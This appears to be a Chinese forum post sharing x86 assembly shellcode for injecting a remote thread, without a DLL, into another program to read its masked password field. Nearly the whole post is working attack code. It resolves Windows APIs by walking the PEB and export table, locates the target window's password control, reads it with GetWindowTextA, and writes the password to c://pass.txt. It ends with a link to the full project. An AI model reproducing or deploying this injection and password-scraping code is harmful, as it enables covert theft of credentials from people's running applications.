[代码]无DLL远程线程注入得到目标程序的星号密码

主体shellcode代码如下:

;module:rmtgetpass.asm
;get password by injecting remote thread
;29-Nov-2008 created by benyanwk

; write this shellcode is a hard work
; so i search the book for a more resonable
; method

; two method:
; (1) using dll file to inject
; (2) using advance shellcode technique
; should make a revision

.386
.model flat,stdcall
option casemap:none

;/////////////////////////////////
;///struct definition
;////////////////////////////////
IMAGE_EXPORT_DIRECTORY STRUCT
  Characteristics           DWORD      ?
  TimeDateStamp             DWORD      ?
  MajorVersion              WORD       ?
  MinorVersion              WORD       ?
  nName                     DWORD      ?
  nBase                     DWORD      ?
  NumberOfFunctions         DWORD      ?
  NumberOfNames             DWORD      ?
  AddressOfFunctions        DWORD      ?
  AddressOfNames            DWORD      ?
  AddressOfNameOrdinals     DWORD      ?
IMAGE_EXPORT_DIRECTORY ENDS

ST_PARAM STRUCT
 ApiAddress DWORD ?
 Pid DWORD ?
 pHwnd DWORD ?
ST_PARAM ENDS
 

;////////////////////////////////////
;///externs
;///////////////////////////////////

.code

_rmtGetPass proc LPARAM:DWORD

 ; get the password by remote thread
 ; using shellcode programming
 

   
;//////////////////////////////
;//shellcode's code
;//////////////////////////////
 
 ; first get the relocation difference

    call rebase
rebase:
    pop ebp;
    sub ebp,offset rebase;
   
    ; get the kernel32.dll's base address
    ; by PEB direct access
    ; place in here not routine
    ; because we need it after
   
    assume fs:nothing;

    mov eax,fs:[30h];   ptr _TEB
    mov eax,[eax+0ch];  ptr _PEB_LDR_DATA
    mov eax,[eax+1ch];  LIST_ENTRY InInitializationOrderModuleList.Flink
    mov eax,[eax];      Flink's Flink
    mov eax,[eax+08h];  the kernel32's base address
    mov [ebp+dwBase],eax;
    mov ecx,eax; the kernel base parameter
    ; get the two key api's address
   
    lea edi,[ebp+sGetProcAddress];
 lea eax,[ebp+getapiaddr];
    call eax; 
   
    add eax,[ebp+dwBase];
    mov [ebp+pGetProcAddress],eax;
   
    lea edi,[ebp+sLoadLibrary];
    lea eax,[ebp+getapiaddr];
    mov ecx,[ebp+dwBase];
    call eax;
   
    add eax,[ebp+dwBase];
    mov [ebp+pLoadLibrary],eax;

    ; get other api's address
    lea eax,[ebp+sWriteFile];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pWriteFile],eax;
   
    lea eax,[ebp+sCreateMailslot];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pCreateMailslot],eax
   
    lea eax,[ebp+sCreateFile];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pCreateFile],eax;
   
     lea eax,[ebp+sGetCurrentProcessId];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetCurrentProcessId],eax;
   
        lea eax,[ebp+sExitThread];
    push eax;;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pExitThread],eax;
   
    lea eax,[ebp+sSleep];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pSleep],eax;
   
    lea eax,[ebp+sUsrDll];
    push eax;

    call [ebp+pLoadLibrary];
    mov [ebp+dwBase2],eax;
            lea eax,[ebp+sGetWindowThreadProcessId];
    push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetWindowThreadProcessId],eax
               
    lea eax,[ebp+sGetWindowText];
    push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetWindowText],eax;
   
    lea eax,[ebp+sGetDlgItem];
    push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetDlgItem],eax;
   
 lea eax,[ebp+sEnumWindows];
 push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pEnumWindows],eax;
   
    ; get the process id
    call [ebp+pGetCurrentProcessId];
    mov [ebp+dwPid],eax;
   
    ; get the target's window p
   
 mov eax,[ebp+pGetWindowThreadProcessId];
 lea esi,[ebp+stParam];
 assume esi:ptr ST_PARAM;
 mov [esi].ApiAddress,eax; 
 mov eax,[ebp+dwPid];
 mov [esi].Pid,eax;
 lea eax,[ebp+hwnd];
 mov [esi].pHwnd,eax;
   
    push esi;
    lea eax,[ebp+enumproc]; enumwindowsproc
    push eax;
    call [ebp+pEnumWindows];
   
    ; we need the enumproc finished
    ; to make sure that we get the hwnd
    ; wait for 1 sec
   
   ; push 1000;
   ; call [ebp+pSleep];
   
    ; get the dialog item
    push IDC_PASS;
    push [ebp+hwnd];
    call [ebp+pGetDlgItem];
   
    ; get the window's password
    push 99;
    lea ebx,[ebp+pass];
    push ebx;
    push eax;
    call [ebp+pGetWindowText];
  
    push 0;
    push 80h; FILE_ATTRIBUTE_NORMAL
    push 2; CREATE_ALWAYS
    push 0;
    push 00000003h; FILE_SHARE_READ|FILE_SHARE_WRITE
    push 00000003h; FILE_READ_DATA|FILE_WRITE_DATA     ;GENERIC_READ|GENERIC_WRITE
    lea eax,[ebp+sFile];
    push eax;
    call [ebp+pCreateFile];
   
   
    push 0;
    lea ecx,[ebp+hwnd]; the return bytes
    push ecx;
    push 100;
    lea ecx,[ebp+pass];
    push ecx;
    push eax;
    call [ebp+pWriteFile];
   
 mov eax,0;
 add esp,4;
 db 0c3h;
   
;///////////////////////////////
;//data definition
;//////////////////////////////

;
; data definition should be placed here
; after the code
; because we need to code at the first
; so the exported symbol could be used
; as proc pointer correctly

 hwnd dd ?
 dwPid dd ?
 pass db 100 dup (?)
    IDC_PASS equ 1001
    dwBase dd ?
    dwBase2 dd ?
 pGetProcAddress dd ?
    pLoadLibrary dd ?
    sUsrDll db "user32.dll",0
    sKrlDll db "kerne32.dll",0
    sGetProcAddress db "GetProcAddress",0
    sLoadLibrary db "LoadLibraryA",0
    sEnumWindows db "EnumWindows",0
    sGetWindowText db "GetWindowTextA",0
    sGetWindowThreadProcessId db "GetWindowThreadProcessId",0
    sGetDlgItem db "GetDlgItem",0
    sCreateFile db "CreateFileA",0
    sWriteFile db "WriteFile",0
    sCreateMailslot db "CreateMailslotA",0
    sExitThread db "ExitThread",0
    sGetCurrentProcessId db "GetCurrentProcessId",0
    sSleep db "Sleep",0
   
    pCreateFile dd ?
    pGetCurrentProcessId dd ?
    pCreateMailslot dd ?
    pExitThread dd ?
    pGetWindowThreadProcessId dd ?
    pGetWindowText dd ?
    pGetDlgItem dd ?
    pEnumWindows dd ?
    pWriteFile dd ?
    pSleep dd ?
   
 sFile db "c://pass.txt",0
   
    stParam ST_PARAM <>
   
    ret
_rmtGetPass endp

getapiaddr:
; get kernel32.dll's api address
; pass argument using edi
; edi point to the api name
; ecx pass the kernel base address

    ; jmp to export directory table
    mov eax,ecx; get the kernel address
    add eax,[eax+3ch];  jmp to the PE signature
    mov eax,[eax+78h]; [rva] the export directory table address
    add eax,ecx;     [va] translate to va
   
    mov esi,eax
    push esi; the export table                   -4
    assume esi: PTR IMAGE_EXPORT_DIRECTORY
   
    ; jmp to name pointers array
   
    mov eax,[esi].AddressOfNames;   [rva] the name pointers address
    add eax,[ebp+dwBase];                 [va] translate to va
    mov ebx,eax;                    the name pointers base address
    push eax;
   
    ; get the api names lengths
    xor ecx,ecx; clear the counter
   
    push esi;         -8
    mov esi,edi;
get_len:
 inc ecx;
 mov al,byte ptr[esi];
 inc esi;
 test al,al;
 jnz get_len;
 
 pop esi; restore the esi;   -4
 
    ; search and match for the desired api
   
    push edi;       protect the desried api name  -8
    push ecx;  the api name length include null -c
find_name:  
    pop ecx;        get the same api name pointer
    pop edi;  api name length
    mov esi,[ebx];  [rva] the name address
    add esi,[ebp+dwBase]; [va] translate to va
    push edi;       protect the desried api name
    push ecx;  protect the api name length;
   @@:
   cmpsb;
    loopz @B;
    test ecx,ecx
    jz find_addr;
 
 
    add ebx,4;      else,loop till match the name
    jmp find_name;
   
find_addr:
    pop edi;                            balance the stack  -8
    pop edi;       balance the stack  -4
   
    pop eax;
    add ebx,4;     increment
    sub ebx,eax;                        get the name pointer diff
   
    ; jmp to the name ordinal table
    pop esi;                            get the export directory table -0
    mov eax,[esi].AddressOfNameOrdinals;[rva] name ordinals address
    add eax,[ebp+dwBase];                     [va] translate to base address
   
   
    ; get the name ordinal
    shr ebx,1;     div by 2
    add eax,ebx;
    mov ax,word ptr [eax];  length word
    and eax,0000ffffh;   clear the high word
   
    ; get the true ordianl
    sub eax,[esi].nBase;
   
    ; get the address
    shl eax,2;     mul by 4
    mov ebx,[esi].AddressOfFunctions;   [rva] function addresses address
    add ebx,[ebp+dwBase];                     [va] translate to va
   

    add ebx,eax;             
    mov eax,[ebx];
   
    ret
   
 

enumproc:
 ; in ss segment you can also use ds segment data
 ; but the relocation will dead.
 ; so we need to pass
 ; (1) the api address
 ; (2) the target's PID as parameter to the
 ; function as a struct pointer
 
 ; notice: this is a stdcall call convention function

 push ebx;  protect it;
 sub esp,4;
 push esp;      local dwPid
 push [esp+10h];  currnet hwnd
   
    mov ebx,[esp+18h]; the st pointer
    mov eax,ds:[ebx]; st.GetWindowThreadProcessId
 call eax;
 
 mov eax,[esp];
 cmp eax,ds:[ebx+4]; compare the pid
    jnz n;
   
 mov eax,[esp+0ch]; current hwnd
 mov ecx,[ebx+8]; st.phwnd
 mov ds:[ecx],eax; st.hwnd = current hwnd
 
    mov eax,0;
    add esp,4;  balance the stack
 pop ebx;
    retn 8;
n:
 add esp,4;
 pop ebx;
    mov eax,1;
    retn 8;
end

 

具体工程文件,请移步至:http://bbs.pediy.com/showthread.php?t=78032下载.